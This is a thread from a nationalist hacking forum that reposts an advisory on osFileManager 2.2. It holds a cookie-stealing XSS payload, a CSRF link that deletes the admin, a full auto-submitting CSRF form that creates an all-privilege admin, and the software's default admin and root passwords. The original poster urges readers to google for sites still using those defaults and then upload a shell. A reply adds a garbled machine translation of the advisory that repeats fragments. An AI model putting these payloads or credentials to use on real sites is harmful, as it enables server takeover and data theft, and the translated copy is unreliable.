Anti-armenia.ORG - Forumlar - osFileManager 2.2 CSRF / XSS / Disclosure/

Forumlar / Hacking Platform / Exploits & Vulnerabilities / osFileManager 2.2 CSRF / XSS / Disclosure/

Istifadəçi

2012-03-27 23:34 GMT

BlackMinD

Pr0grammer

Mesaj Sayı : 1677

Mövzu Sayı :

Rep Ver :

Rep Sayı : 62

Indi Saytda : Durum

Cinsiyyət : Oğlan

Şəhər : KARABAKH IS AZERBAIJAN!

Ölkə :

Məslək :

Yaş :

Mesaj :

Kod:
==========================================================================
Vulnerable Software: osFileManager_2.2
==========================================================================
Official site:http://www.osfilemanager.com/
# md5sum *.zip
df708d52ab2a50aa20fa9c6d779bc979 *osFileManager_2.2.zip
==========================================================================
About Software:
==========================================================================
osFileManager is an open source file management script written in PHP.
Includes User CP, Admin CP, and many basic file creation/modifying tools.
File Functions include: List, Open, View, Edit, Create, Upload, Rename and Move.
User Functions include: Change password, and Change color scheme.
Admin Functions include: New user, Edit user, Delete user.
Looks Nice: http://www.osfilemanager.com/screenshots.html
==========================================================================
Vuln Desc:
osFileManager 2.2 suffers from multiple CROSS SITE SCRIPTING and CROSS SITE REQUEST forgery vulnerabilities.

I noticed many peoples uses osFileManager 2.2
So Just beaware:

XSS (Non persistent XSS)
/index.php?p=home&d=<script>alert(document.cookie);</script>

/* CSRF Delete admin */
/index.php?p=deleteuser&muid=1
Where 1 means user id

Due insufficent sanitization *users administration* section also prone to Persistent CROSS SITE SCRIPTING(XSS) vulnerabilities
Print Screen:
http://s017.radikal.ru/i407/1203/d2/1db7ba7bd6a2.png

(Username & Server Directory inputboxes)
And can be mixed with CSRF POC (in eg: to deface /index.php?p=users sections)

What is funny This FileManager Saves username and password "pair" in cookie which is totally wrong thing especially about *passwords*(sensitive data) (See print screen)
Once cookies stealed ... you know what's this means.

========================== CSRF ADD ADMIN ====================================================================
<body onload="javascript:document.forms[0].submit()">

<form name="user_edit" action="http://CHANGETO_RTARGET/index.php?p=saveuser" method="post">
<tr><td>Username: <td><input type="text" name="config_user" size="40" border="0" class="txtinput" value="pwnyou">
<tr><td>Name: <td><input type="text" name="config_name" size="40" border="0" class="txtinput" value="pwnyou">
<tr><td>Password: <td><input type="password" name="config_pass" size="40" border="0" class="txtinput" value="pwnyou">
<tr><td>Email: <td><input type="text" name="config_email" size="40" border="0" class="txtinput" value="pwnyou@pwnyou.tld">
<tr><td>Server Directory: <td><input type="text" name="config_folder" size="40" border="0" class="txtinput" value=".">
<tr><td>Http Directory: <td><input type="text" name="config_http" size="40" border="0" class="txtinput" value=""> (*)
<input type="text" name="config_limit" size="15" width="15" border="0" class="txtinput" value="500000">

<select name="config_language">
<option value="chinese">Chinese</option>
<option value="english" selected>English</option></select>

<select name="config_theme">
<option value="classic" selected>Classic</option>

</select>

<input type=radio name="config_status" value="1" id="stat1" checked>
<input type=radio name="config_status" value="0" id="stat2">

<input type=radio name="config_formatperms" value="0" id="perm1" checked>
<input type=radio name="config_formatperms" value="1" id="perm2">

<input type="checkbox" name="config_permbrowse" id="config_permbrowse" size="40" border="0" class="text" checked>
<input type="checkbox" name="config_permupload" id="config_permupload" size="40" border="0" class="text" checked>
<input type="checkbox" name="config_permcreate" id="config_permcreate" size="40" border="0" class="text" checked>

<input type="checkbox" name="config_permpass" id="config_permpass" size="40" border="0" class="text" checked>
<input type="checkbox" name="config_permdelete" id="config_permdelete" size="40" border="0" class="text" checked>
<input type="checkbox" name="config_permmove" id="config_permmove" size="40" border="0" class="text" checked>
<input type="checkbox" name="config_permedit" id="config_permedit" size="40" border="0" class="text" checked>
<input type="checkbox" name="config_permrename" id="config_permrename" size="40" border="0" class="text" checked>
<input type="checkbox" name="config_permget" id="config_permget" size="40" border="0" class="text" checked>

<input type="checkbox" name="config_permchmod" id="config_permchmod" size="40" border="0" class="text" checked>
<input type="checkbox" name="config_permsub" id="config_permsub" size="40" border="0" class="text" checked>
<input type="checkbox" name="config_permuser" id="config_permuser" size="40" border="0" class="text" checked>
<input type="checkbox" name="config_permadmin" id="config_permadmin" size="40" border="0" class="text" checked>
<input type="checkbox" name="config_permdeleteuser" id="config_permdeleteuser" size="40" border="0" class="text" checked>
<input type="checkbox" name="config_permedituser" id="config_permedituser" size="40" border="0" class="text" checked>

<input type="checkbox" name="config_permmakeuser" id="config_permmakeuser" size="40" border="0" class="text" checked>
<input type="checkbox" name="config_permprefs" id="config_permprefs" size="40" border="0" class="text" checked>

<input type=hidden name=muid value="">

</form>



========================== EOF CSRF ADD ADMIN =================================================================

What is another issuse do you know?
It's users.sql comes defaultly with 2 users:

--
-- Dumping data for table `osfm_users`
--

INSERT INTO `osfm_users` VALUES(1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99', 'you@email.com', 'Admin', './', '', '20081005234859', '999999999999999999999', 'classic', 'english', 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 0);
INSERT INTO `osfm_users` VALUES(2, 'root', '5f4dcc3b5aa765d61d8327deb882cf99', 'you@email.com', 'root', '.', '', '20081005222012', '500000', 'classic', 'english', 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 0);

login: root
pass: password

And the second one:
username: admin
password: password

During 4-5 minutes googling about it(xxxxx) i found 8 sites which uses same usernames and passwords!!!(Which allows file uploads,file editings,steal database credentials
cos it stores database credentials in index.php ---- In one word: "Paradise")

Theris also a lot of *unitialized* variables which causes E_NOTICE and E_WARNING's which can be classified as Info and Path Disclosure.

I hope developer(s)(http://www.osfilemanager.com/ && http://www.arzy.net/) will fix this all this issuses ASAP.Amin!

======================================= EOF ====================================================================

/AkaStep

http://packetstormsecurity.org/files/110714/osFileManager-2.2-CSRF-XSS-Disclosure.html

Üzrlü sayın İngiliscədir Disclosure.Tərcümə etməyə həvəs yoxdur.
Məhz bu Disclosureni ona görə verirəm ki,Bu FileManegerdə Default loginass söhbəti var)
Əldən iti olsanız +Google-dan istifadə edə bilsəniz kalan sayt tapacaqsınız default loginass istifadə edən.
Sonrası da bəllidir file upload (shell) ordan da oyana serverlə boğuşmaq və s)

Ana VƏTƏN!

Anti-armenia.ORG

Istifadəçi

2012-03-27 23:38 GMT

K0K4!N

İstifadəçi

Mesaj Sayı : 115

Mövzu Sayı :

Rep Ver :

Rep Sayı : 1

Indi Saytda : Durum

Cinsiyyət : Oğlan

Şəhər :

Ölkə :

Məslək :

Yaş : 35

Mesaj :

TƏŞHƏKKÜR QARDAŞH ƏLLƏRİVƏ SAĞLİQ

Buyur Qardaş Tərcümə Alindi

Kod:
================================================== ========================
Zəif Software: osFileManager_2.2
================================================== ========================
Rəsmi sayt: http://www.osfilemanager.com/
# Md5sum *. Zip
df708d52ab2a50aa20fa9c6d779bc979 * osFileManager_2.2.zip
================================================== ========================
Haqqında Software:
================================================== ========================
osFileManager PHP yazılı açıq mənbə-faylı idarə script var.
İstifadəçi CP Admin CP və bir çox əsas fayl yaradılması / değiştirmeyle alətləri daxildir.
Fayl funksiyaları aşağıdakılardır: siyahısı, açıq, nəzərdən keçirmək, redaktə, yaradın, yükle, adlandırın və taşıyın.
İstifadəçi funksiyaları aşağıdakılardır: Parolu və Dəyiş rəng sxemi.
Admin funksiyaları aşağıdakılardır: Yeni istifadəçi, Edit user, Sil user.
Http://www.osfilemanager.com/screenshots.html: Nice görünür
================================================== ========================
Vuln desc:
osFileManager 2.2 çox CROSS site scripting və XAÇ SİTE REQUEST saxtakarlığı zəifliklərin əziyyət çəkir.

Mən bir çox xalqların osFileManager 2.2 istifadə bildirib
Belə ki, Just beaware:

XSS (Qeyri israrlı XSS)
/ Index.php p = ev & d = <script> alert (document.cookie); </ script>

/ * CSRF Sil admin * /
/ Index.php? P = deleteuser & muid = 1
1 istifadəçi id deməkdir harada

Görə insufficent sanitization * istifadəçilər idarəetmə (XSS) Davamlı CROSS site scripting də meylli * bölmə zəifliklərin
Ekran yazdır:
http://s017.radikal.ru/i407/1203/d2/1db7ba7bd6a2.png~~V

(İstifadəçi adı & Server Directory inputboxes)
Və CSRF POC (?: Üçün tahrif / index.php p = istifadəçilər bölmələr məs) qarışdırıla bilər

Funny nədir bu FileManager (print screen bax) xüsusilə * parol * (həssas məlumatları) haqqında tamamilə yanlış bir şeydir hansı cookie İstifadəçi adı və parol "cüt" indirim
Bir cookies stealed ... Bu vasitə olduğunu bilirik.

========================== CSRF ADD ADMIN ===================== ===============================================
<body onload="javascript:document.forms[0].submit()">

<FORM name="user_edit" action="http://CHANGETO_RTARGET/index.php?p=saveuser" method="post">
<tr> <td> İstifadəçi adı: <td> <input type="text" name="config_user" size="40" border="0" class="txtinput" value="pwnyou">
<tr> <td> Ad: <td> <input type="text" name="config_name" size="40" border="0" class="txtinput" value="pwnyou">
<tr> <td> Parol: <td> <input type="password" name="config_pass" size="40" border="0" class="txtinput" value="pwnyou">
<tr> <td> Email: <td> <input type="text" name="config_email" size="40" border="0" class="txtinput" value="pwnyou@pwnyou.tld">
<tr> <td> Server Directory: <td> <input type="text" name="config_folder" size="40" border="0" class="txtinput" value=".">
<tr> <td> Http Directory: <td> <input type="text" name="config_http" size="40" border="0" class="txtinput" value=""> (*)
<input type="text" name="config_limit" size="15" width="15" border="0" class="txtinput" value="500000">

<select name="config_language">
<option value="chinese"> Çin </ seçimi>
<option value="english" selected> İngilis </ seçimi> </ select>

<select name="config_theme">
<option value="classic" selected> Classic </ seçimi>

</ Select>

<input type=radio name="config_status" value="1" id="stat1" checked>
<input type=radio name="config_status" value="0" id="stat2">

<input type=radio name="config_formatperms" value="0" id="perm1" checked>
<input type=radio name="config_formatperms" value="1" id="perm2">

<input type="checkbox" name="config_permbrowse" id="config_permbrowse" size="40" border="0" class="text" checked>
<input type="checkbox" name="config_permupload" id="config_permupload" size="40" border="0" class="text" checked>
<input type="checkbox" name="config_permcreate" id="config_permcreate" size="40" border="0" class="text" checked>

<input type="checkbox" name="config_permpass" id="config_permpass" size="40" border="0" class="text" checked>
<input type="checkbox" name="config_permdelete" id="config_permdelete" size="40" border="0" class="text" checked>
<input type="checkbox" name="config_permmove" id="config_permmove" size="40" border="0" class="text" checked>
<input type="checkbox" name="config_permedit" id="config_permedit" size="40" border="0" class="text" checked>
<input type="checkbox" name="config_permrename" id="config_permrename" size="40" border="0" class="text" checked>
<input type="checkbox" name="config_permget" id="config_permget" size="40" border="0" class="text" checked>

<input type="checkbox" name="config_permchmod" id="config_permchmod" size="40" border="0" class="text" checked>
<input type="checkbox" name="config_permsub" id="config_permsub" size="40" border="0" class="text" checked>
<input type="checkbox" name="config_permuser" id="config_permuser" size="40" border="0" class="text" checked>
<input type="checkbox" name="config_permadmin" id="config_permadmin" size="40" border="0" class="text" checked>
<input type="checkbox" name="config_permdeleteuser" id="config_permdeleteuser" size="40" border="0" class="text" checked>
<input type="checkbox" name="config_permedituser" id="config_permedituser" size="40" border="0" class="text" checked>

<input type="checkbox" name="config_permmakeuser" id="config_permmakeuser" size="40" border="0" class="text" checked>
<input type="checkbox" name="config_permprefs" id="config_permprefs" size="40" border="0" class="text" checked>

<input type=hidden name=muid value="">

</ Form>

<! -
istifadəçi adı: pwnyou
passwd: pwnyou
->

========================== Eof CSRF ADD ADMIN ==================== =============================================

Başqa issuse nə bilirik olunur?
Bu, users.sql 2 istifadəçi ilə defaultly gəlir:

-
- Masa `osfm_users üçün dempinq data`
-

Osfm_users `DEĞERLERİMİZ (" admin "1, '5 f4dcc3b5aa765d61d8327deb882cf99 ',' you@email.com ',' Admin ','. / ','', '20081005234859, '999999999999999999999", "Klassik", "` eklemeniz İngilis, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 0);
(2, "kök", '5 f4dcc3b5aa765d61d8327deb882cf99 ',' you@email.com ',' kök ','. ','', '20081005222012', '500000 ',' Klassik "," İngilis osfm_users `DEĞERLERİMİZ` eklemeniz , 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 0);

Login: kök
şifrə: parol

Və ikinci:
istifadəçi adı: admin
Şifrə: Şifrənizi

Bu barədə googling 4-5 dəqiqə ərzində (XXXXX) i eyni istifadəçi adı və parol istifadə edən 8 sites tapılmadı! (Fayl yüklənməsi, fayl editings, verilənlər bazası etimadnaməsini oğurlamaq verir
cos bir sözlə index.php ---- ildə bazası etimadnaməsini saxlayan: "Cənnət")

Də Theris E_NOTICE və E_WARNING-nin məlumat və yolundan açıqlanması kimi təsnif edilə bilər səbəb olan * unitialized * dəyişənlərin bir çox.

Mən geliştirici (s) (http://www.osfilemanager.com/ && http://www.arzy.net/) Bu bütün bu issuses ASAP.Amin düzeltmek edəcək!

======================================= Eof ========== ================================================== ========

/AkaStep
tp://www.osfilemanager.com/ && http://www.arzy.net/) Bu bütün bu issuses ASAP.Amin düzeltmek edəcək!

======================================= Eof ========== ================================================== ========

/AkaStep[/code]

Anti-armenia.ORG